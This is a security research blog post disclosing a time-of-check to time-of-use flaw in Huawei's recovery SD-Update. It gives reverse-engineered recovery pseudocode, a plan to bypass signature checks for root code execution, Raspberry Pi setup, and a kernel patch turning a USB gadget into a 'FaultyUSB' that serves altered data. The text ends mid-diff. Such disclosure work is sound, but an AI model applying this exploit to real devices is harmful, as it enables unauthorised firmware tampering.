Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we have successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed root privilege code execution to be achieved by remote or local attackers. After Huawei fixed the vulnerabilities we have reported, we decided to take a second look at the new and improved recovery mode update process.
This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Our advisory for the vulnerability is published here.
The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
Huawei SD-update: Updates via SD Card
Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the employed chipset (Hisilicon, Qualcomm, Mediatek) or the used base OS (EMUI, HarmonyOS) of a device.
This common update solution has in fact many ways to apply a system update, one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on an external media, such as on an SD card or on an USB flash drive. After reverse engineering how Huawei implements this mode, we have identified a logic vulnerability in the handling of the update file located on external media, where the update file gets reread between different verification phases.
While this basic vulnerability primitive is straightforward, exploitation of it presented some interesting challenges, not least of which was that we needed to develop a custom software emulation of an USB flash drive to be able to provide the recovery with different data on each read, as well as we had to identify additional gaps of the update process authentication implementation to make it possible to achieve arbitrary code execution as root in recovery mode.
Time-of-Check to Time-of-Use
The root cause of the vulnerability lies in an unfortunate design decision of the external media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in-place.
In bird’s-eye view the update process contains two major steps: verification of the ZIP file signature and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. first it discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.
So in case of an legitimate update archive, once the verification succeeds, the recovery tries to read the media again to perform the actual installation. But a malicious actor can swap the update file just between the two stages, thus the installation phase would use a different, thus unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability, indicating that a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!
Attacking Multiple Reads in the Recovery Binary
With an off-the-shelf USB flash drive it is very clear that by considering a specific offset, two reads without intermediate writes must result in the same data, otherwise the drive would be considered faulty. So in terms of the update procedure this means the data-consistency is preserved: during the update for each point in time the data on the external drive matches up with what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.
Now consider a “faulty” USB flash drive, which returns different data when the same offset if read twice (of course, without any writes between them). This would break the data-consistency assumption of the update process, as it may happen that different update steps see the update file differently.
The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification.
These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media.
For example, in the case of multiple file system accesses of the same location, the update.zip
file itself can be replaced as-is with a completely unrelated file.
Alternatively, multiple reads during the ZIP parsing can be turned into smuggling new ZIP entries inside the original archive (see the CVE-2021-40045: Huawei Recovery Update Zip Signature Verification Bypass vulnerability in UnZiploc).
Accordingly, multiple kinds of exploitation goals can be set.
For example by only modifying the content of the UPDATE.APP
file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash.
A more generic approach is to gain code execution just before writing to flash in the EreInstallPkg
function, by smuggling a custom update-binary
into the ZIP file.
In the following we are going to use the approach of injecting a custom binary in order to achieve the arbitrary code execution by circumventing the update archive verification.
At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effects on exploitability. For readability reasons this challenge is outlined in the next section, so for now we continue with the assumption that we will be able to swap results between repeated read operations.
Sketching out the code flow of an update procedure helps understanding exactly where multiple reads can occur. Since our last exploit) of Huawei’s recovery mode some changes have occured (e.g. functions got renamed), so the update flow is detailed again here for clarity.
First of all, the “SD-update” method is handled by HuaweiUpdateNormal
, which essentially wraps the HuaweiUpdateBase
function.
Below is an excerpt of the function call tree of HuaweiUpdateBase
, mostly indicating the functions which interact with the update media or contain essential verification functions.
HuaweiUpdateBase
├── [> DoCheckUpdateVersion <]
│ ├── {> hw_ensure_path_mounted("/usb") <}
│ ├── CheckVersionInZipPkg
│ │ ├── mzFindZipEntry("SOFTWARE_VER_LIST.mbn")
│ │ ├── mzFindZipEntry("SD_update.tag")
│ │ ├── mzFindZipEntry("OTA_update.tag")
│ │ ├── DoCheckVersion
│ │ ├── mzFindZipEntry("BOARDID_LIST.mbn")
│ └── {> hw_ensure_path_unmounted("/usb") <}
└── HuaweiOtaUpdate
└── DoOtaUpdate
├── MountSdCardWithRetry
│ └── {> hw_ensure_path_mounted("/usb") <}
├── PkgTypeUptVerPreCheck
│ └── HwUpdateTagPreCheck
│ └── UpdateTagCheckInPkg
│ ├── mzFindZipEntry("full_mainpkg.tag")
│ └── GetInfoFromTag("UPT_VER.tag")
├── [> HuaweiUpdatePreCheck <]
│ ├── HuaweiSignatureAndAuthVerify
│ │ ├── HwMapAndVerifyPackage
│ │ │ ├── do_map_package
│ │ │ │ └── hw_ensure_path_mounted("/usb")
│ │ │ ├── HwSignatureVerifyPackage
│ │ │ │ ├── GetInfoFromTag("hotakey_sign_version.tag")
│ │ │ │ └── verify_file_v1
│ │ │ │ └── verifyInstance.Verify
│ │ │ └── GetInfoFromTag("META-INF/CERT.RSA")
│ │ ├── IsSdRootPackage
│ │ │ └── get_zip_pkg_type
│ │ │ ├── mzFindZipEntry("SD_update.tag")
│ │ │ ├── mzFindZipEntry("OTA_update.tag")
│ │ │ └── get_pkg_type_by_tag
│ │ │ └── mzFindZipEntry("OTA/SD_update.tag")
│ │ └── HwUpdateAuthVerify
│ │ ├── IsNeedUpdateAuth
│ │ ├── IsUnauthPkg
│ │ │ ├── IsSDupdatePackageCompress
│ │ │ │ └── mzFindZipEntry("SD_update.tag")
│ │ │ └── mzFindZipEntry("skipauth_pkg.tag")
│ │ └── get_update_auth_file_path
│ │ └── mzFindZipEntry("VERSION.mbn")
│ ├── DoSecVerifyFromZip
│ │ └── HwSecVerifyFromZip
│ │ └── mzFindZipEntry("sec_xloader_header")
│ ├── IsAllowShipDeviceUpdate
│ ├── MtkDevicePreUpdateCheck
│ ├── CheckBoardIdInfo
│ │ └── mzFindZipEntry("BOARDID_LIST.mbn")
│ ├── UpdatePreCheck_wrapper
│ │ └── UpdatePreCheck
│ │ └── CheckPackageInfo
│ │ ├── MapAndOpenZipPkg
│ │ ├── InitPackageInfo
│ │ │ └── mzFindZipEntry("packageinfo.mbn")
│ │ └── CheckZipPkgInfo
│ └── USBUpdateVersionCheck
├── HuaweiUpdatePreUpdate
└── [> EreInstallPkg <]
├── hw_setup_install_mounts
│ └── {> hw_ensure_path_unmounted("/usb") <}
├── do_map_package
│ └── {> hw_ensure_path_mounted("/usb") <}
├── mzFindZipEntry("META-INF/com/google/android/update-binary")
└── execv("/tmp/update_binary")
The functions in square brackets divide the update process into three phases:
- Device firmware version compatibility checking
- Android signature verification, update type and version checking
- Update installation via the provided
update-binary
file
In the first stage the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse engineered pseuodocode.)
bool DoCheckUpdateVersion(ulong argc, char **argv) {
... /* ensures the battery is charged enough, else exit */
for (pkgIndex = 1; argc <= pkgIndex; pkgIndex++) {
curr_arg = argv[pkgIndex];
if (curr_arg || !strncmp(curr_arg,"--update_package=",0x11)) {
log("%s:%s,line=%d:skip path:%s,pkgIndex:%d\n","Info","CheckAllPkgVersionAllow",0x1dd,curr_arg,pkgIndex & 0xffffffff);
continue;
}
curr_arg = curr_arg + 0x11;
log("%s:%s,line=%d:reallyPath:%s\n","Info","DoCheckUpdateVersion",0x1c0,curr_arg);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Here curr_arg points to the file path of the update archive *
* The media which contains this file is getting mounted *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
r = hw_ensure_path_mounted_wrapper(curr_arg,"DoCheckUpdateVersion");
if (r < 0) {
log("%s:%s,line=%d:mount %s fail\n","Err","DoCheckUpdateVersion",0x1c2,curr_arg);
return false;
}
set_versioncheck_flag(0);
SetPkgSignatureFlag(1);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Examine the 'SOFTWARE_VER_LIST.mbn' file for compatibility *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
check_ret = CheckVersionInZipPkg(curr_arg);
SetPkgSignatureFlag(0);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Explicitly unmount the media holding the update archive *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
r = hw_ensure_path_unmounted_wrapper(curr_arg,"DoCheckUpdateVersion");
if (r < 0) {
log("%s:%s,line=%d:unmount %s fail\n","Warn","DoCheckUpdateVersion",0x1cb,curr_arg);
}
if ((check_ret & 1) == 0) {
log("%s:%s,line=%d:%s,not allow in version control\n","Err","DoCheckUpdateVersion",0x1ce,curr_arg);
log("%s:%s,line=%d:push UPDATE_VERSION_CHECK_FAIL_L1\n","Info","DoCheckUpdateVersion",0x1cf);
push_command_stack(&command_stack,0x85);
return false;
}
ret = true;
}
return ret;
}
The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection on the compatibility of the update and the device.
int HuaweiOtaUpdate(int argc, char **argv) {
...
log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
...
ret = DoOtaUpdate(argc, argv);
...
}
int DoOtaUpdate(int argc, char **argv) {
... /* tidy the update package paths */
g_totalPkgSz = 0;
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* The media which contains the update package gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
MountSdCardWithRetry(path_list[pkgIndex],5);
... /* ensuring that the update package does exist */
pkgIndex = pkgIndex + 1;
g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
} while (pkgIndex < count);
log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);
result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
if ((result & 1) == 0) {
log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
return 1;
}
result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
return 1;
}
result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
return 1;
}
...
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
push_command_stack(&command_stack,3);
package_path = path_list[pkgIndex];
... /* ensure the package does exists */
... /* update the visual update progress bar */
log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
pop_command_stack(&command_stack);
log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
push_command_stack(&command_stack,4);
log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
package_path);
/* 'IsPathNeedMount' returns true for the SD update package paths */
needs_mount = IsPathNeedMount(package_path_string);
ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);
... /* update the visual update progress bar */
}
}
int MountSdCardWithRetry(char *path, uint retry_count) {
... /* sanity checks */
if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* USB drives mounted under the '/usb' path, so this path is taken *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
for (trial_count = 1; trial_count < retry_count; trial_count++) {
if (hw_ensure_path_mounted(path))
return 0;
... /* error handling */
sleep(1);
}
log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
return -1;
}
if (hw_ensure_path_mounted(path)) {
... /* error handling */
return -1;
}
return 0;
}
Finally in the third stage the update installation begins by extracting the update-binary
from the update archive and executing it.
From this point forward, the bundled update binary handles the rest of update process, like extracting the UPDATE.APP
file containing the actual data to be flashed.
uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
... /* create and write the 'path' value into the 'last_install' file */
if (!path || g_otaUpdateMode != 1 || get_current_run_mode() != 2) {
log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
ret = hw_setup_install_mounts();
} else {
... /* with SD update mode this path is not taken */
}
if (!ret) {
log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
"Err","install_package",0x5b8);
return 1;
}
... /* logging and visual progess related functions */
ret = do_map_package(path, need_mount & 1, &package_map);
if (!ret) {
log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
return 2;
}
zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
... /* error handling */
updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
push_command_stack(&command_stack,0xd);
... /* error handling */
unlink("/tmp/update_binary");
updatebinary_fd = creat("/tmp/update_binary",0x1ed);
mzExtractZipEntryToFile(&archive,update-binary_entry,updatebinary_fd);
EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
... /* FindUpdateBinaryFunc: check the kind of the update archive */
mzCloseZipArchive(&archive);
...
if (fork() == 0) {
...
execv(updatebinary_path, updatebinary_argv);
_exit(-1);
}
log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
push_command_stack(&command_stack,0x16);
...
}
int hw_setup_install_mounts(void) {
...
for (partition_entry : g_partition_table) {
if (!strcmp(partition_entry, "/tmp")) {
if (hw_ensure_path_mounted(partition_entry)) {
log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
return -1;
}
}
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Every entry in the partition table gets unmounted except /tmp *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
else if (hw_ensure_path_unmounted(partition_entry)) {
log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
if (!strcmp(partition_entry,"/data") && !try_umount_data())
log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
}
}
return 0;
}
int do_map_package(char *path, bool needs_mount, void *package_map) {
... /* sanity checks */
if (needs_mount) {
if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
return 0;
}
for (trial_count = 0; trial_count < 10; trial_count++) {
log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* needs_mount = true, so the USB flash drive gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
if (hw_ensure_path_mounted(path)) {
log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
return 0;
}
... /* error handling */
sleep(1);
}
... /* error handling */
}
if (sysMapFile(path,package_map) == 0) {
log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
return 1;
}
log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
return 0;
}
Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards because the recovery process would try to extract and run the update-binary
file of the update archive.
Thanks to these multiple reads, the attacker could therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges:
- Version checking stage: construct a valid
SOFTWARE_VER_LIST.mbn
file - Signature verification: supply a pristine update archive
- Installation: inject the custom
update-binary
Circumventing Linux Kernel Caching Of External Media
The previous section introduced our “straightforward” exploitation plan.
However, in practice, it does not suffice to just treat the file read syscalls of the update binary as if they could directly result in a unique read request to external media.
The relevant update files are actually mmap
-ed by the update binary, and the generated memory read accesses get handled first by the file system API, then by the block device layer of Linux kernel, and finally, after all those layers, they get forwarded to the external media.
The file system API uses the actual file system implementation (e.g. exFAT) to turn the high level requests (e.g. “read the first 0x400
bytes from the file named /usb/update_sd_base.zip
”) into a lower level access of the underlying block device (e.g. “read 0x200
bytes from offset 0x12340000
and read 0x200
bytes from offset 0x56780000
on the media”).
The block device layer generates the lowest level request, which can be interpreted directly by the storage media, e.g. SCSI commands in case of a USB flash drive.
In addition, the Linux kernel caches the read responses of both the file system API (page cache), and the block devices (block cache, part of the page cache). So at the second time the same read request arrives, the response may be served from cache instead of the storage media, but it depends on the amount of free memory.
Therefore, in the real world, frequent multiple reads of external media normally do not occur thanks to the caching of the operation system. In other words, it is up to the Linux kernel’s caching algorithm when a memory access issued by the recovery binary actually translates into a direct read request to the external media, besides depending heavily on the amount of free memory available. In practice, our analysis showed that the combination of the caching policy and the about 7 GB of free memory (on flagship phones) works surprisingly well, virtually zero reread should be occuring while handling update files, which are at most 5 GB in size, thus they fit into the memory as a whole. So, at first glance, you might think that the Linux kernel’s caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!
We can take a step back from caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we’ve previously defined! The file cache of Linux kernel is naturally bounded to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command would start with an empty cache state, so the update file must be read again directly from the external media. This certainly and deterministically enables an attacker to supply a different update archive or even a completely new file system at each mount command, thus eventually it can be used to bypass the cryptographic verification and supply arbitrary update archive as per above. Phew :)
Creating FaultyUSB
Based on the above, we have an exploit plan, but still what was left is actually implementing our previously discussed “FaultyUSB”: a USB flash drive (USB-OTG mass storage), which can detect the mount events and alter the response data based on a trigger condition. In the following we give a brief, practical guide on how we set up our test environment.
Raspberry Pi As A Development Platform
The Linux kernel has support for USB OTG mass storage device class in general, but we needed to find a computer which has the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for the ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) model was used, as it supports USB OTG mode on its USB-C connector.
Finally we can put the SD card back into the RPi and connect it to a router via the Ethernet interface.
By default, Rasbian OS tries to negotiate an IP address via DHCP and broadcast the raspberry.local
over mDNS protocol, so at first we simply connected to it over SSH via the previously configured username and password.
But we didn’t find the DHCP reliable enough actually, so we decided to use static IP address instead:
sudo systemctl disable dhcpcd.service
sudo systemctl stop dhcpcd.service
echo 'auto eth0
allow-hotplug eth0
iface eth0 inet static
address 10.1.0.1
netmask 255.255.255.0' | sudo tee /etc/network/interfaces.d/eth0
“Raspberry Pi OS Lite (64bit) (2022.04.04.)” is used as a base image for the RPi, and written to an SD card. The size of the used SD card is indifferent as long the OS fits it, approx. minimum 2GB is recommended.
Writing the image to the SD card is straightforward:
xzcat 2022-04-04-raspios-bullseye-arm64-lite.img.xz | sudo dd of=/dev/mmcblk0 bs=4M iflag=fullblock oflag=direct
Then we mount the first partition and create a user account file and the configuration file and we also enable the SSH server.
The userconf.txt
file below defines the pi
user with raspberry
password.
The config file disables the Wi-Fi and the Bluetooth to lower power usage, and also configures the USB controller in OTG mode.
The command line defines the command to load the USB controller with the mass storage module.
mount /dev/mmcblk0p1 /mnt && cd /mnt
touch ssh
echo 'pi:$6$/4.VdYgDm7RJ0qM1$FwXCeQgDKkqrOU3RIRuDSKpauAbBvP11msq9X58c8Que2l1Dwq3vdJMgiZlQSbEXGaY5esVHGBNbCxKLVNqZW1' > userconf.txt
echo 'arm_64bit=1
dtoverlay=dwc2,dr_mode=peripheral
#arm_freq=600
arm_boost=0
disable_splash=1
dtoverlay=disable-bt
dtoverlay=disable-wifi
boot_delay=0' > config.txt
echo 'console=serial0,115200 console=tty1 root=PARTUUID=<UUID>-02 rootfstype=ext4 rootwait modules-load=dwc2,g_mass_storage' > cmdline.txt
cd && umount /dev/mmcblk0p1
Getting High On Our Own Power Supply
The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. In case of supplying power from the IO headers, the regulated 5 V voltage also appears on the VDD pins of the USB-C, and by connecting it to a Huawei phone it incorrectly detects the RPi being in USB host mode instead of the desired OTG mode. As it turned out the USB-C connector on the RPi is not in fact fully USB-C compatible…
Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot up and Huawei phones shut the power down while rebooting into recovery mode. Obviously, this means that the RPi shuts down for lack of power, and the target Huawei phone only enables the power over USB-C when it has been already booted into recovery mode. That’s why it is possible (and during our devlopment this occured several times) that the RPi misses the recovery’s timeout window of waiting for an USB drive, simply because it can’t boot up fast enough.
One way to solve this problem is to boot the phone into eRecovery mode, by holding the Power and Volume Up buttons, because that way the update doesn’t begin automatically, thus giving some time for the RPi to boot up. But we wanted to support a more comfortable way of updating, from the “Project Menu” application, “Software Upgrade / Memory card Updage” option, which results in automatic update of the archive without waiting for any user interaction.
Our solution was to power the RPi via a USB-C breakout board via a dedicated power supply adapter. Also the breakout board passes through the data lines to the target Huawei phone, but the VDD lines are disconnected (i.e. the PCB traces are cut) in the direction of the phone to prevent the RPi to be recognized as a host device. With this setup the RPi can be powered independently of the target device and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.
To further tweak the OS boot time and power consumption, we disable a few unnecessary services:
sudo systemctl disable rsyslog.service
sudo systemctl stop rsyslog.service
sudo systemctl disable avahi-daemon
sudo systemctl stop avahi-daemon
sudo systemctl disable avahi-daemon.socket
sudo systemctl stop avahi-daemon.socket
sudo systemctl disable triggerhappy.service
sudo systemctl stop triggerhappy.service
sudo systemctl disable wpa_supplicant.service
sudo systemctl stop wpa_supplicant.service
sudo systemctl disable systemd-timesyncd
sudo systemctl stop systemd-timesyncd
By further optimizing the power consumption, we disabled as much as we can from the currently unnecessary GPU subsystem. To avoid premature write-exhaustion of the SD card we disable persisting the log files, because we are about to generate quite a few megabytes of them.
echo 'blacklist bcm2835_codec
blacklist bcm2835_isp
blacklist bcm2835_v4l2
blacklist drm
blacklist rpivid_mem
blacklist vc_sm_cma' | sudo tee /etc/modprobe.d/blacklist-bcm2835.conf
echo '[Journal]
Storage=volatile
RuntimeMaxUse=64M' | sudo tee /etc/systemd/journald.conf
Finally we restart the RPi, verify that it is still accessible over SSH and shut it down in preparing of a kernel build.
Kernel Module Patching
The main requirement of the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different results based on current stage.
The most obvious place to implement such feature is directly in the mass storage functionality implementation, which is located at drivers/usb/gadget/function/f_mass_storage.c
in the Linux kernel.
The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process a very simple counting algorithm prooved to be sufficient. Specific parts of the file system seem to be only read during mount events, thus by counting mount-like patterns the update stage can be recovered.
While the trigger condition is active, the read responses are modified by masking by zeros. The read address and the masking area size should be configured to cover the smuggled ZIP at the end of the update archive.
Here is the mass_storage_patch.diff
file, with huge amount of logging code:
diff --git a/drivers/usb/gadget/function/f_mass_storage.c b/drivers/usb/gadget/function/f_mass_storage.c
index 6ad669dde..653463213 100644
--- a/drivers/usb/gadget/function/f_mass_storage.c
+++ b/drivers/usb/gadget/function/f_mass_storage.c
@@ -596,6 +596,8 @@ static int do_read(struct fsg_common *common)
unsigned int amount;
ssize_t nread;
+ loff_t begin, end;
+
/*
* Get the starting Logical Block Address and check that it's
* not too big.
@@ -662,8 +664,35 @@ static int do_read(struct fsg_common *common)
file_offset_tmp = file_offset;
nread = kernel_read(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "READ A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
(unsigned long long)file_offset, (int)nread);
+
+ /* mask read on trigger (e.g. when trigger_counter == 1) */
+ if (
+ ((file_offset + amount) > curlun->payload_offset) &&
+ (file_offset < (curlun->payload_offset + curlun->payload_size))
+ ) {
+ LINFO(curlun, "READ ON PAYLOAD AREA (A=0x%llx S=0x%x)\n",
+ file_offset, amount);
+ if (curlun->trigger_counter == 1) {
+ begin = max(file_offset, curlun->payload_offset) - file_offset;
+ end = min(file_offset + amount, curlun->payload_offset + curlun->payload_size) - file_offset;
+ LINFO(curlun, "READ ZERO-MASKED RANGE: [0x%llx;0x%llx)\n", begin, end);
+ memset(bh->buf + begin, 0, end-begin);
+ }
+ }
+
+ /* detect read on the trigger offset and decrement the trigger counter */
+ if (
+ (curlun->trigger_counter > 0) &&
+ (curlun->trigger_offset >= file_offset) &&
+ (curlun->trigger_offset < (file_offset+amount))
+ ) {
+ LINFO(curlun, "READ ON TRIGGER OFFSET: T=%d\n", curlun->trigger_counter);
+ curlun->trigger_counter -= 1;
+ }
+
if (signal_pending(current))
return -EINTR;
@@ -858,6 +887,7 @@ static int do_write(struct fsg_common *common)
file_offset_tmp = file_offset;
nwritten = kernel_write(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "WRITE A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file write %u @ %llu -> %d\n", amount,
(unsigned long long)file_offset, (int)nwritten);
if (signal_pending(current))
@@ -922,6 +952,7 @@ static void invalidate_sub(struct fsg_lun *curlun)
unsigned long rc;
rc = invalidate_mapping_pages(inode->i_mapping, 0, -1);
+ LINFO(curlun, "invalidate_mapping_pages");
VLDBG(curlun, "invalidate_mapping_pages -> %ld\n", rc);
}
@@ -996,6 +1027,7 @@ static int do_verify(struct fsg_common *common)
file_offset_tmp = file_offset;
nread = kernel_read(curlun->filp, bh->buf, amount,
&file_offset_tmp);
+ LINFO(curlun, "VERIFY A=0x%llx S=0x%x\n", file_offset, amount);
VLDBG(curlun, "file read %u @ %llu -> %d\n", amount,
(unsigned long long) file_offset,
(int) nread);
@@ -2733,6 +2765,12 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
lun->initially_ro = lun->ro;
lun->removable = !!cfg->removable;
+ /* ToC-ToU patch */
+ lun->trigger_counter = cfg->trigger_counter;
+ lun->trigger_offset = cfg->trigger_offset;
+ lun->payload_offset = cfg->payload_offset;
+ lun->payload_size = cfg->payload_size;
+
if (!common->sysfs) {
/* we DON'T own the name!*/
lun->name = name;
@@ -2770,11 +2808,13 @@ int fsg_common_create_lun(struct fsg_common *common, struct fsg_lun_config *cfg,
p = "(error)";
}
}
- pr_info("LUN: %s%s%sfile: %s\n",
+ pr_info("LUN: %s%s%sfile: %s trigger:%d@0x%llx payload:[0x%llx;0x%llx)\n",
lun->removable ? "removable " : "",
lun->ro ? "read only " : "",
lun->cdrom ? "CD-ROM " : "",
- p);
+ p,
+ lun->trigger_counter, lun->trigger_offset,
+ lun->payload_offset, lun->payload_offset+lun->payload_size);
kfree(pathbuf);
return 0;
@@ -3333,6 +3373,9 @@ static struct usb_function_instance *fsg_alloc_inst(void)
goto release_common;
pr_info(FSG_DRIVER_DESC ", version: " FSG_DRIVER_VERSION "\n");
+ pr_info("***********************************\n");
+ pr_info("* Patched for ToC-ToU exploration *\n");
+ pr_info("***********************************\n");
memset(&config, 0, sizeof(config));
config.removable = true;
@@ -3428,6 +3471,12 @@ void fsg_config_from_params(struct fsg_config *cfg,
params->file_count > i && params->file[i][0]
? params->file[i]
: NULL;
+
+ /* ToC-ToU patch */
+ lun->trigger_counter = params->trigger_counter[i];
+ lun->trigger_offset = params->trigger_offset[i];
+ lun->payload_offset = params->payload_offset[i];
+ lun->payload_size = params->payload_size[i];
}
/* Let MSF use defaults */
diff --git a/drivers/usb/gadget/function/f_mass_storage.h b/drivers/usb/gadget/function/f_mass_storage.h
index 3b8c4ce2a..1e13a2177 100644
--- a/drivers/usb/gadget/function/f_mass_storage.h
+++ b/drivers/usb/gadget/function/f_mass_storage.h
@@ -16,6 +16,15 @@ struct fsg_module_parameters {
unsigned int nofua_count;
unsigned int luns; /* nluns */
bool stall; /* can_stall */
+
+ /* ToC-ToU patch */
+ int trigger_counter[FSG_MAX_LUNS];
+ loff_t trigger_offset[FSG_MAX_LUNS];
+ loff_t payload_offset[FSG_MAX_LUNS];
+ loff_t payload_size[FSG_MAX_LUNS];
+ unsigned int trigger_counter_count, trigger_offset_count;
+ unsigned int payload_offset_count, payload_size_count;
+
};
#define _FSG_MODULE_PARAM_ARRAY(prefix, params, name, type, desc) \
@@ -40,6 +49,14 @@ struct fsg_module_parameters {
"true to simulate CD-ROM instead of disk"); \
_FSG_MODULE_PARAM_ARRAY(prefix, params, nofua, bool, \
"true to ignore SCSI WRITE(10,12) FUA bit"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_counter, int, \
+ "The number of masking the payload area with zeros"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_offset, ullong, \
+ "Byte offset of the trigger area"); \
